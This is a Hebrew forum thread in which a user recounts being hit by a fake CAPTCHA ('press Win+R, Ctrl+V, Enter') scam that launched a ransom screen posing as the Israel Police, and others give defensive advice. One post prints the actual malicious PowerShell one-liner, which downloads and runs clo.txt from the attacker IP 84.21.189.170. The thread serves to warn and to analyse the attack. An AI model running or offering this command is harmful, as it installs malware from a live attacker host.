שיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר
-
@975 רק לנסות להבין אם יש לי סינון של נטפרי וכדומה האם אני בעצם מוגן מזה כי אני לא יכול בכלל להתחבר לכתובת של התוקף?
-
אתמול נתבקשתי על ידי אתר שקפץ לי בתור פרסומת, "לאמת שאני לא רובוט
".
רק שזה היה נראה בדיקה שונה, כך זה היה: להקיש לחצן התחל+R, ואז קונטרול+V, ואז אנטר.
את כל "האימות" הזה עשיתי במהירות, כך שלא חשבתי מה זה יכול לחולל.
מיד אחרי השלבים האלה נפתח חלון של PowerShell שהריצה פקודה קצרה ונסגרה ,
מיד נפתח חלון על כל המסך הודעה משטרת ישראל על עבירות חוק מהמחשב, ואמור להנעל המחשב לצמיתות, או תשלום כופר ע"ס: ₪1,100.
אף פעם לא חשבתי שתוכנות כופר יגיעו אלי, עד שהייתי צריך להשבית את כל האנטי וירוס כדי להתקין משהו, ובדיוק בזמן הזה זה קורא.
תחכימו תלמדו ותזהרו!נתתי לai את הפקודה שהדבקתי בחלונית ההתחל שפתחתי, וזה טוען שלקחו ממני כתובת ip, וכנראה סיסמאות
עריכה (לאחר 246 פוסטים שנכתבו בעניין הזה) כדי לקצר תהליכים למי שרוצה סיכום:
|-סיכום/הערכת מצב
פקודת PowerShell שהורצההפקודה שהועתקה כללה שימוש ב-PowerShell כדי להוריד קובץ טקסט (“clo.txt”) מ-IP חיצוני (84.21.189.170), ואז להריץ אותו עם פרמטרים מוסווים.
חלק מהטקסט שהטמיעו לקורבן כדי שידביק (“I am not a bot – Verification ID…”) נועד להטעות משתמשים כך שיחשבו שזה אימות "אני לא רובוט" אמיתי.
️ הסבר על וירוס כופר מסוג Clopמה הווירוס עושה:
יכול לבצע הצפנת קבצים חשובים במערכת.
עלול לגנוב נתונים רגישים ולדרוש תשלום כופר.
יכול למחוק עותקי גיבוי ולמנוע שחזור עצמאי.
משאיר הוראות כופר (Ransom Note) עם כתובת לתשלום (בדרך כלל במטבע קריפטו).
עצות והצעות למי שכבר הפעיל את הוירוסהצעות להגנה/תגובה מיידית:
- כיבוי מיידי של המחשב כדי לנסות לעצור המשך פעילות של הקוד.
- או ניתוק האינטרנט כדי למנוע הורדה נוספת או דיווח למפעילים.
- שינוי סיסמאות.
- מחיקת פרופיל דפדפן שבו הופיעה ההודעה.
- שחזור מידע דרך דיסקים טכנאים.
לגביי אנטי וירוס - אם עוזר במצבים כאלה? עדיין אן תשובה חד משמעית מהמשתמשים כאן. מכיון שייתכן והוירוס מסווה את עצמו גם מפני האנטי וירוס ועוקף אותו...
ולמי שרוצה לדעת איך להיזהר ולהגן על המחשב מפני וירוסים כאלה.
"להקדים רפואה למכה"
- אף פעם לא לבצע פעולות טכניות במחשב, מאתר שאומר לך מה לעשות (כדוגמת Win+R | Ctrl+V Enter). (@מתכנת-חובב).
- אנטי וירוס פעיל כל הזמן, מספיק לדברים כאלה לפחות את המובנה של ווינדוס.
- חסימת PowerShell (צעד מתקדם אבל חכם. הצעת AI)
צריך להגדיר שההרשאה לתוכנה זו - היא רק למנהל, ולא למשתמש רגיל. (לא יודע איך מגדירים). - כדאי להשתמש במנהל סיסמאות אמין במקום סיסמאות בדפדפן. (לדוגמה KeepassXC). (@מישהו12).
תודה לקב"ה - שאם נתקפתם בווירוס - זה היה על המחשב ולא בגופכם.
שימו 🤍 - השתדלתי לסכם מהפוסטים שכתבו כאן בשרשור (הקרדיט כולו שלכם, כתבו לי כדי להוסיף קרדיט אם צריך). זה לא מידע שלי. ייתכן ויש טעויות. -
@ארי בהרבה מקרים
אבל לא תמיד
לדוגמא אם האתר פתוח - נשלח מהאתר של התוקף שיש בו כל מיני דברים - בד"כ בכ"ג ESET לדוג' יעלה אזהרה אם מותקן לך אבל לא תמיד..
ואז קובץ TXT בכלל לא עובר בדיקה לפני ההורדה... -
@MGM-IVR אם אתם מעוניינים לראות מה היה צריך להדביק ב"התחל"- בספויילר.
רק אל תנסו להשתמש בו!!!
אני לא לוקח אחריות.
ולאקרים שבנינו - תפענחו מה עשה בדיוק הפקודה, מה גנבו... אם גנבוpowershell -wi mi (.'powershell' (. 'wget' -usebas '84.21.189.170:5506/clo.txt'));I am not a bot - Verification ID: #8620
@יונימדיה כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:
ולאקרים שבנינו - תפענחו מה עשה בדיוק הפקודה, מה גנבו... אם גנבו
זה פקודה שמושכת מהאתר סקריפט
זה מאוד ידוע השיטה הזאת
מהIP הזה משכו את הקובץ 84.21.189.170:5506/clo.txt אפשר לראות מה יש שם... -
@יונימדיה כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:
ולאקרים שבנינו - תפענחו מה עשה בדיוק הפקודה, מה גנבו... אם גנבו
זה פקודה שמושכת מהאתר סקריפט
זה מאוד ידוע השיטה הזאת
מהIP הזה משכו את הקובץ 84.21.189.170:5506/clo.txt אפשר לראות מה יש שם... -
בתכלס בלי לראות את הקובץ עצמו אין דרך לדעת מה הוא עשה... יתכן שחלק מההרצה זה למחוק אותו.
ניסיתי לשכנע את gpt להוריד אותו ולפענח אבל הוא לא מצליח לגשת אליו...
@עידו300 זה לא פעיל עכשיו הפורט הזה
-
@יונימדיה משטרת ישראל על עבירות חוק מהמחשב,
היה נראה הודעות בעברית טבעית? עם לוגו והכול?
מוזר.
בכול אופן כמו שכתבו פה לשנות סיסמאות ולאפס את המחשב.
@cfopuser כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:
בכול אופן כמו שכתבו פה לשנות סיסמאות ולאפס את המחשב.
קודם שיכבה ויוציא את הקבצים...
-
@יונימדיה משטרת ישראל על עבירות חוק מהמחשב,
היה נראה הודעות בעברית טבעית? עם לוגו והכול?
מוזר.בכול אופן כמו שכתבו פה לשנות סיסמאות ולאפס את המחשב.
-
@עידו300 לא.יש דבר שנקרה התמדה שזה אומר שהפורץ מכניס הרבה דרכים להתחבר למחשב שלו.אי אפשר למחוק נקודתית
אבל כן צריך לחלץ את כל המערכת עם דיסק טכנאים פשוט
-
@עידו300 לא.יש דבר שנקרה התמדה שזה אומר שהפורץ מכניס הרבה דרכים להתחבר למחשב שלו.אי אפשר למחוק נקודתית
אבל כן צריך לחלץ את כל המערכת עם דיסק טכנאים פשוט
@יוסי-רחמים לדעתי לנקות עם אנטי וירוס, אם זה הclop הזה אז הוא מוכר לחברות האנטיוירוסים.
תראו איך הבינה מלאכותית עובדת. שלחתי שאלה על הכתובת הנ"ל בג'ימני, תראו מה קיבלתי.
זוהי כתובת זדונית ומסוכנת ביותר. אל תיכנס לקישור ואל תוריד את הקובץ.
על סמך המידע הטכני, מדובר בחלק מהונאת "אימות אני לא רובוט" (Captcha) מזויפת שמסתובבת כעת ברשת (במיוחד בישראל). הנה מה שהקובץ הזה מכיל ומה הוא עושה:
מה זה הקובץ clo.txt?
למרות שהסיומת היא .txt (קובץ טקסט), התוכן שלו הוא למעשה קוד זדוני (סקריפט PowerShell). התוקפים משתמשים בסיומת טקסט כדי להטעות מערכות אבטחה ולגרום לקובץ להיראות תמים.[1][2]איך זה עובד?
בדרך כלל, אתר זדוני מבקש מהמשתמש לבצע "אימות" על ידי לחיצה על המקשים Windows + R (פתיחת חלונית ההפעלה), לאחר מכן Ctrl + V (הדבקה), ואז Enter.
פעולה זו מריצה פקודה שמורידה את הקובץ הזה (clo.txt) מהכתובת שציינת ומפעילה אותו מיד על המחשב.מה הנזק?
הקובץ משמש כ"משפך" (Dropper) שמוריד ומתקין תוכנת כופר (Ransomware) או נוזקה שנועלת את המחשב.[1][3]דיווחים עדכניים משייכים את הכתובת הזו לנוזקה שמתחזה ל"משטרת ישראל" או נועלת את הקבצים ודורשת תשלום (למשל 1,100 ש"ח) לשחרור המחשב.[1][3]
הקוד מנסה להסתיר את עצמו (שימוש בפקודה -WindowStyle Hidden) כדי שתהליך ההדבקה יקרה ברקע בלי שתבחין.
אם הקלדת את הפקודה והפעלת אותה:
נתק את האינטרנט מיד: כדי למנוע מהנוזקה לתקשר עם השרתים שלה או להצפין קבצים נוספים בענן.
אל תשלם כופר: אין ערובה שישחררו את הקבצים.
פנה לעזרה מקצועית: ייתכן שתצטרך לשחזר את המחשב מגיבוי.[1][3]
אם רק ראית את הכתובת ולא הפעלת כלום:
אתה בטוח. פשוט סגור את הדפדפן והימנע מהאתר שהפנה אותך לשם.Sources
help
mitmachim.top
mitmachim.top
mitmachim.top
Google Search Suggestions
Display of Search Suggestions is required when using Grounding with Google Search. Learn more
84.21.189.170 clo.txt -
@עידו300 לא.יש דבר שנקרה התמדה שזה אומר שהפורץ מכניס הרבה דרכים להתחבר למחשב שלו.אי אפשר למחוק נקודתית
אבל כן צריך לחלץ את כל המערכת עם דיסק טכנאים פשוט
@יוסי-רחמים כמו"A
לכן א. חילוץ החומר מבחוץ כמו"ש לעיל.
ב. פרימוט והתקנה של מערכת נקיה + אנטיוי אפי' גירסת נסיון של ESET לא פחות -
@יוסי-רחמים לדעתי לנקות עם אנטי וירוס, אם זה הclop הזה אז הוא מוכר לחברות האנטיוירוסים.
תראו איך הבינה מלאכותית עובדת. שלחתי שאלה על הכתובת הנ"ל בג'ימני, תראו מה קיבלתי.
זוהי כתובת זדונית ומסוכנת ביותר. אל תיכנס לקישור ואל תוריד את הקובץ.
על סמך המידע הטכני, מדובר בחלק מהונאת "אימות אני לא רובוט" (Captcha) מזויפת שמסתובבת כעת ברשת (במיוחד בישראל). הנה מה שהקובץ הזה מכיל ומה הוא עושה:
מה זה הקובץ clo.txt?
למרות שהסיומת היא .txt (קובץ טקסט), התוכן שלו הוא למעשה קוד זדוני (סקריפט PowerShell). התוקפים משתמשים בסיומת טקסט כדי להטעות מערכות אבטחה ולגרום לקובץ להיראות תמים.[1][2]איך זה עובד?
בדרך כלל, אתר זדוני מבקש מהמשתמש לבצע "אימות" על ידי לחיצה על המקשים Windows + R (פתיחת חלונית ההפעלה), לאחר מכן Ctrl + V (הדבקה), ואז Enter.
פעולה זו מריצה פקודה שמורידה את הקובץ הזה (clo.txt) מהכתובת שציינת ומפעילה אותו מיד על המחשב.מה הנזק?
הקובץ משמש כ"משפך" (Dropper) שמוריד ומתקין תוכנת כופר (Ransomware) או נוזקה שנועלת את המחשב.[1][3]דיווחים עדכניים משייכים את הכתובת הזו לנוזקה שמתחזה ל"משטרת ישראל" או נועלת את הקבצים ודורשת תשלום (למשל 1,100 ש"ח) לשחרור המחשב.[1][3]
הקוד מנסה להסתיר את עצמו (שימוש בפקודה -WindowStyle Hidden) כדי שתהליך ההדבקה יקרה ברקע בלי שתבחין.
אם הקלדת את הפקודה והפעלת אותה:
נתק את האינטרנט מיד: כדי למנוע מהנוזקה לתקשר עם השרתים שלה או להצפין קבצים נוספים בענן.
אל תשלם כופר: אין ערובה שישחררו את הקבצים.
פנה לעזרה מקצועית: ייתכן שתצטרך לשחזר את המחשב מגיבוי.[1][3]
אם רק ראית את הכתובת ולא הפעלת כלום:
אתה בטוח. פשוט סגור את הדפדפן והימנע מהאתר שהפנה אותך לשם.Sources
help
mitmachim.top
mitmachim.top
mitmachim.top
Google Search Suggestions
Display of Search Suggestions is required when using Grounding with Google Search. Learn more
84.21.189.170 clo.txt@עידו300 רק הבעיה היא שאתה לא יודע מה היה בסקריפט... כל עוד אתה לא יודע מה היה בו אז זה מסוכן...
יכול להיות שהיה שם פקודה שכל פעם שהמחשב נדלק להתחבר לשרת של התוקף(C2) ואז הוא שולט לך על המחשב
מצד שני זה יכול להיות רק וירוס פשוט... -
@יוסי-רחמים לדעתי לנקות עם אנטי וירוס, אם זה הclop הזה אז הוא מוכר לחברות האנטיוירוסים.
תראו איך הבינה מלאכותית עובדת. שלחתי שאלה על הכתובת הנ"ל בג'ימני, תראו מה קיבלתי.
זוהי כתובת זדונית ומסוכנת ביותר. אל תיכנס לקישור ואל תוריד את הקובץ.
על סמך המידע הטכני, מדובר בחלק מהונאת "אימות אני לא רובוט" (Captcha) מזויפת שמסתובבת כעת ברשת (במיוחד בישראל). הנה מה שהקובץ הזה מכיל ומה הוא עושה:
מה זה הקובץ clo.txt?
למרות שהסיומת היא .txt (קובץ טקסט), התוכן שלו הוא למעשה קוד זדוני (סקריפט PowerShell). התוקפים משתמשים בסיומת טקסט כדי להטעות מערכות אבטחה ולגרום לקובץ להיראות תמים.[1][2]איך זה עובד?
בדרך כלל, אתר זדוני מבקש מהמשתמש לבצע "אימות" על ידי לחיצה על המקשים Windows + R (פתיחת חלונית ההפעלה), לאחר מכן Ctrl + V (הדבקה), ואז Enter.
פעולה זו מריצה פקודה שמורידה את הקובץ הזה (clo.txt) מהכתובת שציינת ומפעילה אותו מיד על המחשב.מה הנזק?
הקובץ משמש כ"משפך" (Dropper) שמוריד ומתקין תוכנת כופר (Ransomware) או נוזקה שנועלת את המחשב.[1][3]דיווחים עדכניים משייכים את הכתובת הזו לנוזקה שמתחזה ל"משטרת ישראל" או נועלת את הקבצים ודורשת תשלום (למשל 1,100 ש"ח) לשחרור המחשב.[1][3]
הקוד מנסה להסתיר את עצמו (שימוש בפקודה -WindowStyle Hidden) כדי שתהליך ההדבקה יקרה ברקע בלי שתבחין.
אם הקלדת את הפקודה והפעלת אותה:
נתק את האינטרנט מיד: כדי למנוע מהנוזקה לתקשר עם השרתים שלה או להצפין קבצים נוספים בענן.
אל תשלם כופר: אין ערובה שישחררו את הקבצים.
פנה לעזרה מקצועית: ייתכן שתצטרך לשחזר את המחשב מגיבוי.[1][3]
אם רק ראית את הכתובת ולא הפעלת כלום:
אתה בטוח. פשוט סגור את הדפדפן והימנע מהאתר שהפנה אותך לשם.Sources
help
mitmachim.top
mitmachim.top
mitmachim.top
Google Search Suggestions
Display of Search Suggestions is required when using Grounding with Google Search. Learn more
84.21.189.170 clo.txt -
@עידו300 והנה לנו גלגל מידע שלא נגמר
@עידו300 כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:
Sources
help
mitmachim.top
mitmachim.top
mitmachim.topדבר דומה קורה לפעמים בויקיפדיה
-
דרך אגב זה כבר פורסם בעבר ווריאציות של הוירוס הזה
https://mitmachim.top/topic/74608/הסבר-איך-לקבל-וירוס-בצורה-כל-כך-פשוטה-וההסבר-של-התהליך -
@mgm-ivr @1divid האתר שממנו נפתחה לי החלונית הזדונית נקרא בשם https://עריכה: מחקתי את הקישור לאתר כדי שלא יהיה בעיות לאחרים - תחשבו פעמיים אם להכנס לאתר - אני לא יודע מה יהיה ההשלכות.
זה אתר להורדה מיוטיוב (לא פתוח בנטפרי).
אני השתמשתי בו בכמויות וגם הוא הכי טוב שהכרתי. כל שיר שמורידים הוא פותח כרטיסייה בדפדפן לפרסומות. (למרות שיש לי חוסם פרסומות מעולה. שחסם חוץ ממנו).
@cfopuser מצרף לכם תמונות צילום מסך (קבלו את השגיאות כתיב)
-
@mgm-ivr @1divid האתר שממנו נפתחה לי החלונית הזדונית נקרא בשם https://עריכה: מחקתי את הקישור לאתר כדי שלא יהיה בעיות לאחרים - תחשבו פעמיים אם להכנס לאתר - אני לא יודע מה יהיה ההשלכות.
זה אתר להורדה מיוטיוב (לא פתוח בנטפרי).
אני השתמשתי בו בכמויות וגם הוא הכי טוב שהכרתי. כל שיר שמורידים הוא פותח כרטיסייה בדפדפן לפרסומות. (למרות שיש לי חוסם פרסומות מעולה. שחסם חוץ ממנו).
@cfopuser מצרף לכם תמונות צילום מסך (קבלו את השגיאות כתיב)
@יונימדיה המחשב מוצפן?מה זה עשה?זה סתם פישינג?
-
@mgm-ivr @1divid האתר שממנו נפתחה לי החלונית הזדונית נקרא בשם https://עריכה: מחקתי את הקישור לאתר כדי שלא יהיה בעיות לאחרים - תחשבו פעמיים אם להכנס לאתר - אני לא יודע מה יהיה ההשלכות.
זה אתר להורדה מיוטיוב (לא פתוח בנטפרי).
אני השתמשתי בו בכמויות וגם הוא הכי טוב שהכרתי. כל שיר שמורידים הוא פותח כרטיסייה בדפדפן לפרסומות. (למרות שיש לי חוסם פרסומות מעולה. שחסם חוץ ממנו).
@cfopuser מצרף לכם תמונות צילום מסך (קבלו את השגיאות כתיב)
 { const baseUrl = "https://www.google.co.il/search?q=site:mitmachim.top"; const m = location.pathname.match(/^\/(topic|category)\/(\d+)/); const type = m ? m[1] : null; const id = m ? m[2] : null; let searchInput; function search(path = "") { const query = searchInput.value.trim(); if (query) { window.open(`${baseUrl}${path}%20${encodeURIComponent(query)}`, "_blank"); } } let buttons = {}; buttons.searchAll = { id: "bb-search-all", label: `חיפוש ${type ? "בכל הפורום" : ""}`, className: type ? "btn-secondary" : "btn-primary", callback: () => search(), }; if (type === "topic") { buttons.searchTopic = { label: "חיפוש בנושא זה", className: "btn-primary", callback: () => search(`/topic/${id}`), }; } else if (type === "category") { buttons.searchCategory = { label: "חיפוש בקטגוריה זו", className: "btn-primary", callback: () => search(`/category/${id}`), }; } buttons.cancel = { label: "ביטול", className: "btn-default", "data-bs-dismiss": "modal" }; const dialog = bootbox.dialog({ title: '<div style="text-align:center;"><img src="/assets/uploads/files/1625950269825-mt-google.png" width="400" alt="חיפוש בגוגל"></div>', message: '<input id="bb-inp" class="bootbox-input bootbox-input-text form-control" placeholder="הקלידו כדי לחפש בגוגל" autocomplete="off"/>', buttons, backdrop: true, show: true, onEscape: true }); dialog.on("shown.bs.modal", function () { searchInput = document.getElementById("bb-inp"); if (searchInput) { searchInput.focus(); searchInput.addEventListener("keydown", function (e) { if (e.key === "Enter") { e.preventDefault(); const query = this.value.trim(); if (query) { search(); dialog.modal("hide"); } } else if (e.key === "Escape") { e.preventDefault(); dialog.modal("hide"); } }); } const searchAllButton = document.getElementById("bb-search-all"); if (searchAllButton) { searchAllButton.title = "לחצו על אנטר כדי לחפש"; } }); })(); void 0;){kind=link}